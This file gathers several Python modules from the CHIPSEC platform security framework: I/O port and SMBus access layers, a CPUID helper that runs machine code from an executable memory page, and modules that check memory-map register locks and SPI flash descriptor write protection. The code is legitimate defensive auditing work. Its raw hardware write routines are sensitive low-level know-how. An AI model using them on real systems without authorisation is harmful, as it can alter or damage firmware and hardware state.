            logger().log(f"[io] reading word from I/O port 0x{io_port:04X} -> 0x{value:04X}")
        return value

    def read_port_byte(self, io_port: int) -> int:
        value = self.helper.read_io_port(io_port, 1)
        if logger().HAL:
            logger().log(f"[io] reading byte from I/O port 0x{io_port:04X} -> 0x{value:02X}")
        return value

    def write_port_byte(self, io_port: int, value: int) -> int:
        if logger().HAL:
            logger().log(f"[io] writing byte to I/O port 0x{io_port:04X} <- 0x{value:02X}")
        status = self.helper.write_io_port(io_port, value, 1)
        return status

    def write_port_word(self, io_port: int, value: int) -> int:
        if logger().HAL:
            logger().log(f"[io] writing word to I/O port 0x{io_port:04X} <- 0x{value:04X}")
        status = self.helper.write_io_port(io_port, value, 2)
        return status

    def write_port_dword(self, io_port: int, value: int) -> int:
        if logger().HAL:
            logger().log(f"[io] writing dword to I/O port 0x{io_port:04X} <- 0x{value:08X}")
        status = self.helper.write_io_port(io_port, value, 4)
        return status

    #
    # Read registers from I/O range
    #
    def read_IO(self, range_base: int, range_size: int, size: int = 1) -> List[int]:
        n = range_size // size
        io_ports = []
        for i in range(n):
            io_ports.append(self._read_port(range_base + i * size, size))
        return io_ports

    #
    # Dump I/O range
    #
    def dump_IO(self, range_base: int, range_size: int, size: int = 1) -> None:
        n = range_size // size
        fmt = f'0{size * 2:d}X'
        logger().log(f"[io] I/O register range [0x{range_base:04X}:0x{range_base:04X}+{range_size:04X}]:")
        for i in range(n):
            reg = self._read_port(range_base + i * size, size)
            logger().log(f'+{size * i:04X}: {reg:{fmt}}')



# -*- coding: utf-8 -*-
# Copyright (c) 2020 Intel Corporation
# SPDX-License-Identifier: GPL-2.0-only
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (c) 2014 Anders Høst
# Copyright (c) 2018 Anders Høst
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.


import mmap
import platform
from collections.abc import Callable, Generator
from ctypes import CFUNCTYPE, POINTER, Structure, addressof, c_uint32, c_void_p, sizeof
from typing import Tuple
from chipsec.library.logger import logger

# Posix x86_64:
# Three first call registers : RDI, RSI, RDX
# Volatile registers         : RAX, RCX, RDX, RSI, RDI, R8-11

# cdecl 32 bit:
# Three first call registers : Stack (%esp)
# Volatile registers         : EAX, ECX, EDX

_POSIX_64_OPC = bytes((
    0x53,                    # push   %rbx
    0x89, 0xf0,              # mov    %esi,%eax
    0x89, 0xd1,              # mov    %edx,%ecx
    0x0f, 0xa2,              # cpuid
    0x89, 0x07,              # mov    %eax,(%rdi)
    0x89, 0x5f, 0x04,        # mov    %ebx,0x4(%rdi)
    0x89, 0x4f, 0x08,        # mov    %ecx,0x8(%rdi)
    0x89, 0x57, 0x0c,        # mov    %edx,0xc(%rdi)
    0x5b,                    # pop    %rbx
    0xc3                     # retq
))

_CDECL_32_OPC = bytes((
    0x53,                    # push   %ebx
    0x57,                    # push   %edi
    0x8b, 0x7c, 0x24, 0x0c,  # mov    0xc(%esp),%edi
    0x8b, 0x44, 0x24, 0x10,  # mov    0x10(%esp),%eax
    0x8b, 0x4c, 0x24, 0x14,  # mov    0x14(%esp),%ecx
    0x0f, 0xa2,              # cpuid
    0x89, 0x07,              # mov    %eax,(%edi)
    0x89, 0x5f, 0x04,        # mov    %ebx,0x4(%edi)
    0x89, 0x4f, 0x08,        # mov    %ecx,0x8(%edi)
    0x89, 0x57, 0x0c,        # mov    %edx,0xc(%edi)
    0x5f,                    # pop    %edi
    0x5b,                    # pop    %ebx
    0xc3                     # ret
))

is_64bit = sizeof(c_void_p) == 8


class CPUID_struct(Structure):
    _fields_ = [(r, c_uint32) for r in ("eax", "ebx", "ecx", "edx")]


class CPUID:
    def __init__(self) -> None:
        if platform.machine() not in ("AMD64", "x86_64", "x86", "i686"):
            raise SystemError("Only available for x86")

        code: bytes = _POSIX_64_OPC if is_64bit else _CDECL_32_OPC
        self.addr = mmap.mmap(-1, mmap.PAGESIZE, flags=mmap.MAP_PRIVATE, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
        self.addr.write(code)

        func_type = CFUNCTYPE(None, POINTER(CPUID_struct), c_uint32, c_uint32)
        self.fp = c_void_p.from_buffer(self.addr)
        self.func_ptr: Callable[[CPUID_struct, int, int], None] = func_type(addressof(self.fp))

    def __call__(self, eax: int, ecx: int = 0) -> Tuple[int, int, int, int]:
        struct = CPUID_struct()
        self.func_ptr(struct, eax, ecx)
        return struct.eax, struct.ebx, struct.ecx, struct.edx

    def __del__(self) -> None:
        del self.fp
        self.addr.close()


if __name__ == "__main__":
    def valid_inputs() -> Generator[Tuple[int, Tuple[int, int, int, int]], None, None]:
        cpuid = CPUID()
        for eax in (0x0, 0x80000000):
            highest, _, _, _ = cpuid(eax)
            while eax <= highest:
                regs = cpuid(eax)
                yield (eax, regs)
                eax += 1

    logger().log(" ".join(x.ljust(8) for x in ("CPUID", "A", "B", "C", "D")).strip())
    for eax, regs in valid_inputs():
        reg_string = " ".join(f"{reg:08X}" for reg in regs)
        logger().log(f'{eax:08X} {reg_string}')



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
This module verifies memory map secure configuration,
that memory map registers are correctly configured and locked down.

Usage:
  ``chipsec_main -m common.memconfig``

Example:
    >>> chipsec_main.py -m common.memconfig

.. note::
    - This module will only run on Core (client) platforms.
"""

from chipsec.module_common import BaseModule, HWCONFIG
from chipsec.library.returncode import ModuleResult
from typing import List

_MODULE_NAME = 'memconfig'

TAGS = [HWCONFIG]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'MEMCONFIG']


class memconfig(BaseModule):

    def __init__(self):
        BaseModule.__init__(self)
        self.memmap_registers = {
            'PCI0.0.0_GGC': 'GGCLOCK',
            'PCI0.0.0_PAVPC': 'PAVPLCK',
            'PCI0.0.0_DPR': 'LOCK',
            'PCI0.0.0_MESEG_MASK': 'MELCK',
            'PCI0.0.0_REMAPBASE': 'LOCK',
            'PCI0.0.0_REMAPLIMIT': 'LOCK',
            'PCI0.0.0_TOM': 'LOCK',
            'PCI0.0.0_TOUUD': 'LOCK',
            'PCI0.0.0_BDSM': 'LOCK',
            'PCI0.0.0_BGSM': 'LOCK',
            'PCI0.0.0_TSEGMB': 'LOCK',
            'PCI0.0.0_TOLUD': 'LOCK'
        }

    def is_supported(self) -> bool:
        if self.cs.is_intel():
            if self.cs.is_core():
                return True
            self.logger.log_important("Not a 'Core' (Desktop) platform.  Skipping test.")
        else:
            self.logger.log_important('Not an Intel platform.  Skipping test.')
        return False

    def check_memmap_locks(self) -> int:

        ia_untrusted = None
        if self.cs.register.has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):
            ia_untrusted = self.cs.register.read_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')

        regs = sorted(self.memmap_registers.keys())
        all_locked = True

        self.logger.log('[*]')
        if ia_untrusted is not None:
            self.logger.log('[*] Checking legacy register lock state:')
        else:
            self.logger.log('[*] Checking register lock state:')
        for reg in regs:
            reg_field = self.memmap_registers[reg]
            if not self.cs.register.has_field(reg, reg_field):
                self.logger.log_important(f'Skipping Validation: Register {reg} or field {reg_field} was not defined for this platform.')
                continue
            reg_def = self.cs.register.get_def(reg)
            reg_value = self.cs.register.read(reg)
            reg_desc = reg_def['desc']
            locked = self.cs.register.get_field(reg, reg_value, reg_field)
            if locked == 1:
                self.logger.log_good(f'{reg:20} = 0x{reg_value:016X} - LOCKED   - {reg_desc}')
            else:
                all_locked = False
                self.logger.log_bad(f'{reg:20} = 0x{reg_value:016X} - UNLOCKED - {reg_desc}')

        if ia_untrusted is not None:
            self.logger.log('[*]')
            self.logger.log('[*] Checking if IA Untrusted mode is used to lock registers')
            if ia_untrusted == 1:
                self.logger.log_good('IA Untrusted mode set')
                all_locked = True
            else:
                self.logger.log_bad('IA Untrusted mode not set')

        self.logger.log('[*]')
        if all_locked:
            res = ModuleResult.PASSED
            self.logger.log_passed('All memory map registers seem to be locked down')
        else:
            res = ModuleResult.FAILED
            self.logger.log_failed('Not all memory map registers are locked down')
            self.result.setStatusBit(self.result.status.LOCKS)

        return res

    def run(self, module_argv: List[str]) -> int:
        self.logger.start_test('Host Bridge Memory Map Locks')
        self.res = self.check_memmap_locks()
        return self.result.getReturnCode(self.res)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
The SPI Flash Descriptor indicates read/write permissions for devices to access regions of the flash memory.
This module simply reads the Flash Descriptor and checks that software cannot modify the Flash Descriptor itself.
If software can write to the Flash Descriptor, then software could bypass any protection defined by it.
While often used for debugging, this should not be the case on production systems.

This module checks that software cannot write to the flash descriptor.

Usage:
    ``chipsec_main -m common.spi_desc``

Examples:
    >>> chipsec_main.py -m common.spi_desc

Registers used:
    - FRAP.BRRA
    - FRAP.BRWA

"""

from chipsec.library.exceptions import CSReadError
from chipsec.module_common import BaseModule, BIOS
from chipsec.library.returncode import ModuleResult
from chipsec.hal.spi import FLASH_DESCRIPTOR
from typing import List

TAGS = [BIOS]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'SPI_DESC']


class spi_desc(BaseModule):

    def __init__(self):
        BaseModule.__init__(self)

    def is_supported(self) -> bool:
        if self.cs.register.has_all_fields('FRAP', ['BRRA', 'BRWA']):
            return True
        self.logger.log_important('FRAP.BRWA or FRAP.BRRA registers not defined for platform.  Skipping module.')
        return False

    def check_flash_access_permissions(self) -> int:

        res = ModuleResult.PASSED
        frap = self.cs.register.read('FRAP')
        self.cs.register.print('FRAP', frap)
        brra = self.cs.register.get_field('FRAP', frap, 'BRRA')
        brwa = self.cs.register.get_field('FRAP', frap, 'BRWA')

        self.logger.log(f'[*] Software access to SPI flash regions: read = 0x{brra:02X}, write = 0x{brwa:02X}')
        if brwa & (1 << FLASH_DESCRIPTOR):
            res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.ACCESS_RW)
            self.logger.log_bad('Software has write access to SPI flash descriptor')

        self.logger.log('')
        if ModuleResult.PASSED == res:
            self.logger.log_passed('SPI flash permissions prevent SW from writing to flash descriptor')
        elif ModuleResult.FAILED == res:
            self.logger.log_failed('SPI flash permissions allow SW to write flash descriptor')
            self.logger.log_important('System may be using alternative protection by including descriptor region in SPI Protected Range Registers')

        return self.result.getReturnCode(res)

    def run(self, module_argv: List[str]) -> int:
        self.logger.start_test('SPI Flash Region Access Control')
        try:
            self.res = self.check_flash_access_permissions()
        except CSReadError as err:
            self.logger.log_warning(f'Unable to read register: {err}')
            self.result.setStatusBit(self.result.status.VERIFY)
            self.res = self.result.getReturnCode(ModuleResult.WARNING)
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------

"""
Access to SMBus Controller
"""
from chipsec.hal import iobar, hal_base
from chipsec.library.exceptions import IOBARNotFoundError, RegisterNotFoundError

SMBUS_COMMAND_QUICK = 0
SMBUS_COMMAND_BYTE = 1
SMBUS_COMMAND_BYTE_DATA = 2
SMBUS_COMMAND_WORD_DATA = 3
SMBUS_COMMAND_PROCESS_CALL = 4
SMBUS_COMMAND_BLOCK = 5
SMBUS_COMMAND_I2C_READ = 6
SMBUS_COMMAND_BLOCK_PROCESS = 7

SMBUS_POLL_COUNT = 1000

SMBUS_COMMAND_WRITE = 0
SMBUS_COMMAND_READ = 1


class SMBus(hal_base.HALBase):

    def __init__(self, cs):
        super(SMBus, self).__init__(cs)
        self.iobar = iobar.IOBAR(self.cs)
        self.smb_reg_status = 'SMBUS_HST_STS'
        self.smb_reg_command = 'SMBUS_HST_CMD'
        self.smb_reg_address = 'SMBUS_HST_SLVA'
        self.smb_reg_control = 'SMBUS_HST_CNT'
        self.smb_reg_data0 = 'SMBUS_HST_D0'
        self.smb_reg_data1 = 'SMBUS_HST_D1'

    def get_SMBus_Base_Address(self) -> int:
        if self.iobar.is_IO_BAR_defined('SMBUS_BASE'):
            (sba_base, _) = self.iobar.get_IO_BAR_base_address('SMBUS_BASE')
            return sba_base
        else:
            raise IOBARNotFoundError('IOBARAccessError: SMBUS_BASE')

    def get_SMBus_HCFG(self) -> int:
        if self.cs.register.is_defined('SMBUS_HCFG'):
            reg_value = self.cs.register.read('SMBUS_HCFG')
            if self.logger.HAL:
                self.cs.register.print('SMBUS_HCFG', reg_value)
            return reg_value
        else:
            raise RegisterNotFoundError('RegisterNotFound: SMBUS_HCFG')

    def display_SMBus_info(self) -> None:
        self.logger.log_hal(f'[smbus] SMBus Base Address: 0x{self.get_SMBus_Base_Address():04X}')
        self.get_SMBus_HCFG()

    def is_SMBus_enabled(self) -> bool:
        return self.cs.device.is_enabled('SMBUS')

    def is_SMBus_supported(self) -> bool:
        (did, vid) = self.cs.device.get_VendorID('SMBUS')
        self.logger.log_hal(f'[smbus] SMBus Controller (DID,VID) = (0x{did:04X},0x{vid:04X})')
        if (0x8086 == vid):
            return True
        else:
            self.logger.log_error(f'Unknown SMBus Controller (DID,VID) = (0x{did:04X},0x{vid:04X})')
            return False

    def is_SMBus_host_controller_enabled(self) -> int:
        hcfg = self.get_SMBus_HCFG()
        return self.cs.register.get_field("SMBUS_HCFG", hcfg, "HST_EN")

    def enable_SMBus_host_controller(self) -> None:
        # Enable SMBus Host Controller Interface in HCFG
        reg_value = self.cs.register.read('SMBUS_HCFG')
        if 0 == (reg_value & 0x1):
            self.cs.register.write('SMBUS_HCFG', (reg_value | 0x1))
        # @TODO: check SBA is programmed
        sba = self.get_SMBus_Base_Address()
        # Enable SMBus I/O Space
        cmd = self.cs.register.read('SMBUS_CMD')
        if 0 == (cmd & 0x1):
            self.cs.register.write('SMBUS_CMD', (cmd | 0x1))

    def reset_SMBus_controller(self) -> bool:
        reg_value = self.cs.register.read('SMBUS_HCFG')
        self.cs.register.write('SMBUS_HCFG', reg_value | 0x08)
        for i in range(SMBUS_POLL_COUNT):
            if (self.cs.register.read('SMBUS_HCFG') & 0x08) == 0:
                return True
        return False

    #
    # SMBus commands
    #

    # waits for SMBus to become ready
    def _is_smbus_ready(self) -> bool:
        busy = None
        for i in range(SMBUS_POLL_COUNT):
            # time.sleep( SMBUS_POLL_SLEEP_INTERVAL )
            busy = self.cs.register.read_field(self.smb_reg_status, 'BUSY')
            if 0 == busy:
                return True
        return 0 == busy

    # waits for SMBus transaction to complete
    def _wait_for_cycle(self) -> bool:
        busy = None
        for i in range(SMBUS_POLL_COUNT):
            # time.sleep( SMBUS_POLL_SLEEP_INTERVAL )
            sts = self.cs.register.read(self.smb_reg_status)
            busy = self.cs.register.get_field(self.smb_reg_status, sts, 'BUSY')
            intr = self.cs.register.get_field(self.smb_reg_status, sts, 'INTR')
            failed = self.cs.register.get_field(self.smb_reg_status, sts, 'FAILED')
            if 0 == busy and 1 == intr:
                # if self.logger.HAL:
                #    intr = chipsec.chipset.get_register_field( self.cs, self.smb_reg_status, sts, 'INTR' )
                #    self.logger.log( "[smbus]: INTR = {:d}".format(intr) )
                break
            elif 1 == failed:
                # kill = 0
                # if chipsec.chipset.register_has_field( self.cs, self.smb_reg_control, 'KILL' ):
                #    kill = chipsec.chipset.read_register_field( self.cs, self.smb_reg_control, 'KILL' )
                if self.logger.HAL:
                    self.logger.log_error("SMBus transaction failed (FAILED/ERROR bit = 1)")
                return False
            else:
                if self.cs.register.has_field(self.smb_reg_status, 'DEV_ERR'):
                    if 1 == self.cs.register.get_field(self.smb_reg_status, sts, 'DEV_ERR'):
                        if self.logger.HAL:
                            self.logger.log_error("SMBus device error (invalid cmd, unclaimed cycle or time-out error)")
                        return False
                if self.cs.register.has_field(self.smb_reg_status, 'BUS_ERR'):
                    if 1 == self.cs.register.get_field(self.smb_reg_status, sts, 'BUS_ERR'):
                        if self.logger.HAL:
                            self.logger.log_error("SMBus bus error")
                        return False
        return 0 == busy

    def read_byte(self, target_address: int, offset: int) -> int:
        # clear status bits
        self.cs.register.write(self.smb_reg_status, 0xFF)

        # SMBus txn RW direction = Read, SMBus slave address = target_address
        hst_sa = 0x0
        hst_sa = self.cs.register.set_field(self.smb_reg_address, hst_sa, 'RW', SMBUS_COMMAND_READ)
        hst_sa = self.cs.register.set_field(self.smb_reg_address, hst_sa, 'Address', target_address, True)
        self.cs.register.write(self.smb_reg_address, hst_sa)
        # command data = byte offset (bus txn address)
        self.cs.register.write_field(self.smb_reg_command, 'DataOffset', offset)
        # command = Byte Data
        # if self.cs.register.has_field( self.smb_reg_control, 'SMB_CMD' ):
        self.cs.register.write_field(self.smb_reg_control, 'SMB_CMD', SMBUS_COMMAND_BYTE_DATA)
        # send SMBus txn
        self.cs.register.write_field(self.smb_reg_control, 'START', 1)

        # wait for cycle to complete
        if not self._wait_for_cycle():
            return 0xFF
        # read the data
        value = self.cs.register.read_field(self.smb_reg_data0, 'Data')
        # clear status bits
        self.cs.register.write(self.smb_reg_status, 0xFF)
        # clear address/offset registers
        # chipsec.chipset.write_register( self.cs, self.smb_reg_address, 0x0 )
        # chipsec.chipset.write_register( self.cs, self.smb_reg_command, 0x0 )
        self.logger.log_hal(f'[smbus] read device {target_address:X} off {offset:X} = {value:X}')
        return value

    def write_byte(self, target_address: int, offset: int, value: int) -> bool:
        # clear status bits
        self.cs.register.write(self.smb_reg_status, 0xFF)

        # SMBus txn RW direction = Write, SMBus slave address = target_address
        hst_sa = 0x0
        hst_sa = self.cs.register.set_field(self.smb_reg_address, hst_sa, 'RW', SMBUS_COMMAND_WRITE)
        hst_sa = self.cs.register.set_field(self.smb_reg_address, hst_sa, 'Address', target_address, True)
        self.cs.register.write(self.smb_reg_address, hst_sa)
        # command data = byte offset (bus txn address)
        self.cs.register.write_field(self.smb_reg_command, 'DataOffset', offset)
        # write the data
        self.cs.register.write_field(self.smb_reg_data0, 'Data', value)
        # command = Byte Data
        # if self.cs.register.has_field( self.smb_reg_control, 'SMB_CMD' ):
        self.cs.register.write_field(self.smb_reg_control, 'SMB_CMD', SMBUS_COMMAND_BYTE_DATA)
        # send SMBus txn
        self.cs.register.write_field(self.smb_reg_control, 'START', 1)

        # wait for cycle to complete
        if not self._wait_for_cycle():
            return False
        # clear status bits
        self.cs.register.write(self.smb_reg_status, 0xFF)
        # clear address/offset registers
        # chipsec.chipset.write_register( self.cs, self.smb_reg_address, 0x0 )
        # chipsec.chipset.write_register( self.cs, self.smb_reg_command, 0x0 )
        self.logger.log_hal(f'[smbus] write to device {target_address:X} off {offset:X} = {value:X}')
        return True

    def read_range(self, target_address: int, start_offset: int, size: int) -> bytes:
        buffer = bytes(self.read_byte(target_address, start_offset + i) for i in range(size))
        self.logger.log_hal(f'[smbus] reading {size:d} bytes from device 0x{target_address:X} at offset {start_offset:X}')
        return buffer

    def write_range(self, target_address: int, start_offset: int, buffer: bytes) -> bool:
        for i, b in enumerate(buffer):
            self.write_byte(target_address, start_offset + i, b)
        self.logger.log_hal(f'[smbus] writing {len(buffer):d} bytes to device 0x{target_address:X} at offset {start_offset:X}')
        return True



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2018-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
>>> chipsec_util deltas <previous> <current> [out-format] [out-name]

out-format - JSON | XML
out-name - Output file name

Example:
>>> chipsec_util deltas run1.json run2.json

"""

from time import time
from argparse import ArgumentParser

from chipsec.command import BaseCommand, toLoad
import chipsec.library.result_deltas
from chipsec.library.options import Options


class DeltasCommand(BaseCommand):

    def requirements(self) -> toLoad:
        return toLoad.Nil

    def parse_arguments(self) -> None:
        options = Options()
        try:
            default_format = options.get_section_data('Util_Config', 'log_output_deltas_format')
            default_out_file = options.get_section_data('Util_Config', 'deltas_output_file')
        except Exception:
            default_format = 'JSON'
            default_out_file = 'log_output_deltas.json'
        parser = ArgumentParser(usage=__doc__)
        parser.add_argument('_prev_log', metavar='<previous>', help='previous log file')
        parser.add_argument('_cur_log', metavar='<current>', help='current log file')
        parser.add_argument('_out_format', nargs='?', choices=['JSON', 'XML'], default=default_format, help='output format')
        parser.add_argument('_out_name', nargs='?', default=default_out_file, help='output filename')
        parser.parse_args(self.argv, namespace=self)

    def run(self) -> None:
        start_time = time()

        # Read files and determine deltas
        previous = chipsec.library.result_deltas.get_json_results(self._prev_log)
        current = chipsec.library.result_deltas.get_json_results(self._cur_log)
        if previous is None or current is None:
            self.logger.log_error('Unable to process JSON log files.')
            return
        deltas = chipsec.library.result_deltas.compute_result_deltas(previous, current)

        # Generate output file here...
        if self._out_name:
            if self._out_format == 'JSON':
                chipsec.library.result_deltas.log_deltas_json(deltas, self._out_name)
            elif self._out_format.upper() == 'XML':
                chipsec.library.result_deltas.log_deltas_xml(deltas, self._out_name)
            else:
                self.logger.log_error(f'Output log format not supported: {self._out_format}')

        # Display the results
        chipsec.library.result_deltas.display_deltas(deltas, True, start_time)

        return


commands = {'deltas': DeltasCommand}
